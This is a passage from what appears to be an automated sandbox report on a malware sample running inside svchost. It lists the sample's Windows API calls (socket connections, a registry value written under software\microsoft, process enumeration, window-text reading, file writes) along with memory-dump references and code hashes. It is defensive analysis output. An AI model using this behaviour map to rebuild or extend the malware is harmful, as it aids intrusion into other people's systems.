                                                                                                                                                                                                                • shutdown.WS2_32(02D3949C,00000001), ref: 02D393C0
                                                                                                                                                                                                                • recv.WS2_32(02D3949C,?,00000400,00000000), ref: 02D393DF
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000400,00000000), ref: 02D393F5
                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 02D39409
                                                                                                                                                                                                                • closesocket.WS2_32(02D3949C), ref: 02D3940C
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 02D39410
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1638183600-0
                                                                                                                                                                                                                • Opcode ID: 6d479929b0b34a5996104260ff8127dbe7bfa52826a875b9f2da897d38b5058d
                                                                                                                                                                                                                • Instruction ID: c69c0eaa91245fbb077011d8f3747c895a6eb8588316d1b8302fbdf9528ac33a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d479929b0b34a5996104260ff8127dbe7bfa52826a875b9f2da897d38b5058d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FF081B29503187BD7209A64DC89F9A3B6CAB48B50F404444BB09BB2C0D6F4EC41CEF4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?,?,?,02D23BDC,?), ref: 02D23A90
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,a1633ef1a,00000000,00000004,?,00000004,?,?,02D23BDC,?), ref: 02D23AAC
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000,?,?,02D23BDC,?), ref: 02D23ABA
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,02D23BDC,?), ref: 02D23AC8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                • String ID: a1633ef1a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2510291871-2677533378
                                                                                                                                                                                                                • Opcode ID: cdfa7e64b656b542d6ff4f6ba16f065e27e138e01be88a16b77e4c43fefaf2f5
                                                                                                                                                                                                                • Instruction ID: a1bb66a6156f50090f399fc1f89ab3bc162fb84a481553522e88800ab8106cc0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdfa7e64b656b542d6ff4f6ba16f065e27e138e01be88a16b77e4c43fefaf2f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF01DB5A44208FBE710CAA1ED0AFAE776CAB04B05F604854FA01A6340D674DE54D6B0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040160B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll$)@
                                                                                                                                                                                                                • API String ID: 1545651562-3472953331
                                                                                                                                                                                                                • Opcode ID: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
                                                                                                                                                                                                                • Instruction ID: a861cb93b7f16bf3c872219f5ba967f96d5ad720afefe63f3816ea97d3f010e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89E01AB0600310DBEB009FB2AD09A563699AA94B113448836A709F21E2DA3CD810CA6D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D49236
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D4923D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D4924A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D49251
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D49260
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D49263
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D49270
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D49273
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                • Opcode ID: cd345bcac21f129ac36e829782efd032ea251bb9d6817a8cb1ca0d232a519287
                                                                                                                                                                                                                • Instruction ID: f28ef49680dc3c3c0b6d4b240521a3df84541210442775acf6a9c83ad6983083
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd345bcac21f129ac36e829782efd032ea251bb9d6817a8cb1ca0d232a519287
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D31C771900304ABDF20DF6AD888BDB7BA9EF84324F448549ED499B345CB31DD50CBA0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 2a4a3516542e248dedfe7fb650a7c09612070ef7df0757f448cd5ce49c9cf9cb
                                                                                                                                                                                                                • Instruction ID: 1eb36ab8373324cbfb0d39d7d44927a682cfee57935c29491b1aaf9382101ca6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a4a3516542e248dedfe7fb650a7c09612070ef7df0757f448cd5ce49c9cf9cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A01DE72A812046BDB206BA6FC8CF9B3B5CEB81754F604422F20886340CB35CC54CAF1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02D4E0CF
                                                                                                                                                                                                                • MoveFileA.KERNEL32(?,?), ref: 02D4E2BD
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02D4E301
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D4E373
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$AttributesCreateDirectoryMovefree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1026147201-0
                                                                                                                                                                                                                • Opcode ID: 461195cbd3074ee0c49a04be3cdb316551f566b7e5422e2f23119277b5ac2372
                                                                                                                                                                                                                • Instruction ID: b18ffa15a9dc32d019423ee1a36367f997f081b55c6e35ad2f91a639d18666b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 461195cbd3074ee0c49a04be3cdb316551f566b7e5422e2f23119277b5ac2372
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1241363090435AAFCB218F789898BEA7FA5AF16304F5489A8E9C5C7341DF31DD49CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02D48654
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02D48F97), ref: 02D4866E
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D48696
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02D48F97), ref: 02D486A2
                                                                                                                                                                                                                  • Part of subcall function 02D45580: GetHandleInformation.KERNEL32(?,00000000), ref: 02D45594
                                                                                                                                                                                                                  • Part of subcall function 02D45580: CloseHandle.KERNEL32(?), ref: 02D455A5
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D486CE
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00140B17,02D48F97,00000000,00140B17), ref: 02D48700
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3741995677-0
                                                                                                                                                                                                                • Opcode ID: b9050220fe1be3304c314a584f1dabd220ca1b68d8b02ccb91f4b371a3ebf6d8
                                                                                                                                                                                                                • Instruction ID: 63ed4bbe744b6ecc783bdf835c445ef4e0e18f30e7cd8910ed9f8e18ebb1b51d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9050220fe1be3304c314a584f1dabd220ca1b68d8b02ccb91f4b371a3ebf6d8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC317CB2A41209BBD710DF99EC85B6AF7B8FB58754F10825AE90497740DB70AD60CBE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 02D390FE
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D3912F
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D3915B
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D39182
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D391A4
                                                                                                                                                                                                                • WSASetLastError.WS2_32(?), ref: 02D391CE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast$Read
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2835504744-0
                                                                                                                                                                                                                • Opcode ID: f6c9e7965ca2a2c75c5b40afbcd7e58e4779261153d1990399de020c16319d9d
                                                                                                                                                                                                                • Instruction ID: bbbed7a31981974d4ea21404ccbef477d919f4a6235cb4c192b3284d753d1643
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6c9e7965ca2a2c75c5b40afbcd7e58e4779261153d1990399de020c16319d9d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A341B5B5E41209AFDB40DFA9D895AEEBBF5EB48200F508529E905E7300E7749951CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D50E50: htons.WS2_32(?), ref: 02D50E74
                                                                                                                                                                                                                  • Part of subcall function 02D50E50: inet_addr.WS2_32(?), ref: 02D50E7F
                                                                                                                                                                                                                  • Part of subcall function 02D50E50: htonl.WS2_32(000000FF), ref: 02D50E8A
                                                                                                                                                                                                                  • Part of subcall function 02D50E50: gethostbyname.WS2_32(?), ref: 02D50E96
                                                                                                                                                                                                                  • Part of subcall function 02D50E50: socket.WS2_32(00000002,00000001,00000000), ref: 02D50EB0
                                                                                                                                                                                                                  • Part of subcall function 02D50E50: connect.WS2_32(00000000,?,00000010), ref: 02D50EC3
                                                                                                                                                                                                                  • Part of subcall function 02D50E50: closesocket.WS2_32(00000000), ref: 02D50ECE
                                                                                                                                                                                                                • setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02D50B2F
                                                                                                                                                                                                                • closesocket.WS2_32 ref: 02D50B44
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: closesocket$connectgethostbynamehtonlhtonsinet_addrsetsockoptsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2706992148-0
                                                                                                                                                                                                                • Opcode ID: 2ef2c1b06cc830ed670971286c024e55e2d7fddef8ba422b81b6d377605553ed
                                                                                                                                                                                                                • Instruction ID: fcbbe9500475ccfe6ed08e3275299f968514a1511e884f9a8da2c1d27f10d0a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ef2c1b06cc830ed670971286c024e55e2d7fddef8ba422b81b6d377605553ed
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2231E671A01525BFDB108F68D888BE9B7A9FF08355F908256FA14D6280FBB19D50CBE1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02D44EFB
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D44F2C
                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 02D44F48
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 02D44F4E
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D44F5C
                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02D44F74
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1800058468-0
                                                                                                                                                                                                                • Opcode ID: 01360ba4b214ee4ceb44b3713fcc22c76a6296ec82eee32bdcb12a528a49f68d
                                                                                                                                                                                                                • Instruction ID: 6072eb25d4c8007a219cfd8f302513b69171d2d51a0bc179c5772573778d9ac9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01360ba4b214ee4ceb44b3713fcc22c76a6296ec82eee32bdcb12a528a49f68d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C811AE71BD030567E73099989C8AFAE7719DB40B50F504511FB00DE2C0DBA1ECD1C6B5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D45407
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D45415
                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 02D4543D
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 02D45460
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,00000000), ref: 02D45479
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D4548A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3955875343-0
                                                                                                                                                                                                                • Opcode ID: bafa23e9194e93e6e0f8d37643cca4dcbfdc0215ab384b33cb683fa60e9d4356
                                                                                                                                                                                                                • Instruction ID: 9337e2c38f191b7128a02dfdceefd5346b75ac520bcc6a7446aec0e34e027709
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bafa23e9194e93e6e0f8d37643cca4dcbfdc0215ab384b33cb683fa60e9d4356
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4711D372D01228ABD720DA64BC497EEB7A8EB49325FD40195E90CA3340E7345F54CAE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02D32A9E
                                                                                                                                                                                                                • GetWindowTextA.USER32(00000000,?,00000104), ref: 02D32AB9
                                                                                                                                                                                                                  • Part of subcall function 02D32260: memset.MSVCRT ref: 02D32277
                                                                                                                                                                                                                  • Part of subcall function 02D32260: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,74DEF550,00000000), ref: 02D3228E
                                                                                                                                                                                                                  • Part of subcall function 02D32260: PathAddBackslashA.SHLWAPI(?,?,74DEF550,00000000), ref: 02D3229B
                                                                                                                                                                                                                  • Part of subcall function 02D32260: PathFileExistsA.SHLWAPI(?,?,74DEF550,00000000), ref: 02D322D7
                                                                                                                                                                                                                  • Part of subcall function 02D32260: lstrcpynA.KERNEL32(02D79F08,00000000,00000104,00000000,00000001,?,74DEF550,00000000), ref: 02D32301
                                                                                                                                                                                                                  • Part of subcall function 02D32260: GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02D32310
                                                                                                                                                                                                                  • Part of subcall function 02D32260: HeapValidate.KERNEL32(00000000,?,74DEF550,00000000), ref: 02D32313
                                                                                                                                                                                                                  • Part of subcall function 02D32260: GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02D32320
                                                                                                                                                                                                                  • Part of subcall function 02D32260: HeapFree.KERNEL32(00000000,?,74DEF550,00000000), ref: 02D32323
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32B17
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D32B1A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32B27
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D32B2A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 649337724-0
                                                                                                                                                                                                                • Opcode ID: 18f9b076a42b9c0dff4f25e7b17f3e0407bd66cb64af89d52bd19b817145a74f
                                                                                                                                                                                                                • Instruction ID: 2345f8a877e5645d0724b5a1b41f6977beed7ad3b898d4b1c5051a13108f7135
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18f9b076a42b9c0dff4f25e7b17f3e0407bd66cb64af89d52bd19b817145a74f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5411B232E4821467DB215B34EC6CFE73BA9AB55314F440990ED8497380EBA4DC88C6B0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D2B88F
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02D2B8B4
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2B8C2
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32 ref: 02D2B8F7
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02D2B8FE
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02D2B90E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1675675969-0
                                                                                                                                                                                                                • Opcode ID: 3416725fd011014eecf9b482e164a28be3fe2313a6815529a485dc82e2d2ee10
                                                                                                                                                                                                                • Instruction ID: c2aa9dba7167c1beb6aaa021b211738587b68faa9b6b515770573ed26b4bcfd6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3416725fd011014eecf9b482e164a28be3fe2313a6815529a485dc82e2d2ee10
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5201C031A40220DFD7148B14F80CFE573A4AB99B2CF090AA6E905AB381C3F55D92CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(02D2CB54,00000000), ref: 02D2CA2F
                                                                                                                                                                                                                • GetWindowLongA.USER32(02D2CB54,000000F0), ref: 02D2CA49
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(02D2CB54,000000FA,?), ref: 02D2CA64
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(02D2CB54,000000FB,0000003C), ref: 02D2CA91
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 4167475372-4251816714
                                                                                                                                                                                                                • Opcode ID: 54a6b0094ad218c9d2cf094949b952dad4b2df4ed1cbc7f8ce314e0026e27887
                                                                                                                                                                                                                • Instruction ID: bd2bebd03e82e6b17d85f98d1e2ee3777cfcd6c64a990874a21f3802951ba3fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54a6b0094ad218c9d2cf094949b952dad4b2df4ed1cbc7f8ce314e0026e27887
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B311270904B01AFC324CF6AD584A5AFBF5BB58314B508A2EE49A93B54E730F884CF90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02D48FF4,00000000,00140B17), ref: 02D48B55
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D48FF4,00000000,00140B17), ref: 02D48B5C
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D48B6F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,02D48FF0,?,02D48FF4,00000000,00140B17), ref: 02D48C1E
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02D48FF4,00000000,00140B17), ref: 02D48C21
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02D48FF4,00000000,00140B17), ref: 02D48C2D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02D48FF4,00000000,00140B17), ref: 02D48C30
